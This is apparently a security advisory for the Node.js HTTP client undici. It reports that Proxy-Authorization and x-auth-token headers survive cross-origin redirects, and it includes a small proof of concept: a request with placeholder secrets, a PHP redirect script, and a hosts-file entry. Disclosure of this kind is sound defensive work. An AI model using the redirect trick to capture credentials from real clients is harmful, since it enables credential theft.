Proxy-Authorization header not cleared on cross-origin redirect in undici.request

Summary:: Undici already cleared Authorization and Cookie headers on cross-origin redirects, but did not clear Proxy-Authorization and x-auth-token headers. Description: Like https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3, this is a fixed security issue in v5.28.3, v6.6.1, but I have tested the new version(v6.7.0) and it has not been fixed yet. Steps To Reproduce: POC: ``` var undici = require('undici'); const { statusCode, headers, trailers, body } = undici.request({ method: 'GET', maxRedirections: 1, origin: "http://127.0.0.1/", pathname: "", headers: { 'content-type': 'application/json', 'Cookie': 'secret Cookie', 'Authorization': 'secret Authorization', 'Proxy-Authorization': 'secret Proxy-Authorization', 'x-auth-token': 'secret x-auth-token', 'Host': 'test.cn' } }) ``` The http://127.0.0.1/ is a redirect server. Sourcecode: ``` <?php header("Location: http://a.com:2333"); ?> ``` Add the 1 record in the /etc/hosts file: ``` 127.0.0.1 a.com ``` Listening on port 2333 and discovering that Proxy-Authorization headers has been passed. Impact: ```<[email protected]``` Supporting Material/References: https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Proxy-Authorization ## Impact Undici already cleared Authorization and Cookie headers on cross-origin redirects, but did not clear Proxy-Authorization headers.